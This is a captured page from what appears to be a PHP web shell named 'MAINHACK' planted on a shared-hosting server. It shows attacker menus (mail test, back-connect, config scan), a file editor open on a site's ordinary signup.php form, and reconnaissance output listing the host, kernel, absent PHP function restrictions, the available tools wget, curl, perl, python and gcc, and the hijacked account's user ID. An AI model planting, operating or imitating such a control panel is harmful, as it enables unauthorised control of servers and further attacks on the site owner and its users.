[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: signup.php
<?php include('header2.php');?> <!-- Sign Up --> <div class="sing-up"> <div class="container"> <div class="sing-up-text"> <h3>Sign Up</h3> <h5>Already have an account? <a href="login.php" target="_blank" ><b>Log In</b></a></h5> <div class="sing-up-form"> <form method="post" id="form"> <div class="form-left-to-w3l " id="b_name"> <input type="text" placeholder="Full Name" name="name" required=""> <input type="hidden" name="tablename" value="client"> </div> <div class="form-left-to-w3l " id="b_name"> <input type="text" placeholder="Phone No" name="phone" required=""> <input type="hidden" name="tablename" value="client"> </div> <div class="form-left-to-w3l"> <input type="email" placeholder="Email" onblur="return check_em()" name="email_c" id="em" required=""> <span class="label label-danger" id="error1" style="display:none"> Email already in use.Please Give another Email ID</span> </div> <div class="form-left-to-w3l"> <input type="password" placeholder="Password" id="pass1" onkeyup="checkPass(); return false;" name="password" required=""> </div> <div class="form-left-to-w3l"> <input type="password" placeholder="Confirm Password" id="pass2" onkeyup="checkPass(); return false;" name="cpassword1" required=""> <div id="error-nwl"></div> </div> <div class="form-sub-acc"> <div class="form-sub"> <input type="submit" class="" name="sub" id="btn" value="Sign in"> </div> </div> </form> </div> <div class="sing-up-social"> <a href="#" target="_blank" title="FACEBOOK"><img src="images/facebook.png" alt="" class="facebook-img"></a> <a href="#" target="_blank" title="GOOGLE"><img src="images/google.png" alt="" class="google-img"></a> </div> </div> </div> </div> <?php include('footer.php');?>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server05.hostinghome.co.in
Server IP: 192.168.74.40
PHP Version: 7.4.33
Server Software: Apache
System: Linux server05.hostinghome.co.in 3.10.0-962.3.2.lve1.5.81.el7.x86_64 #1 SMP Wed May 31 10:36:47 UTC 2023 x86_64
HDD Total: 1.95 TB
HDD Free: 677.52 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Disabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: itsweb
User ID (UID): 1619
Group ID (GID): 1621
Script Owner UID: 1619
Current Dir Owner: 1619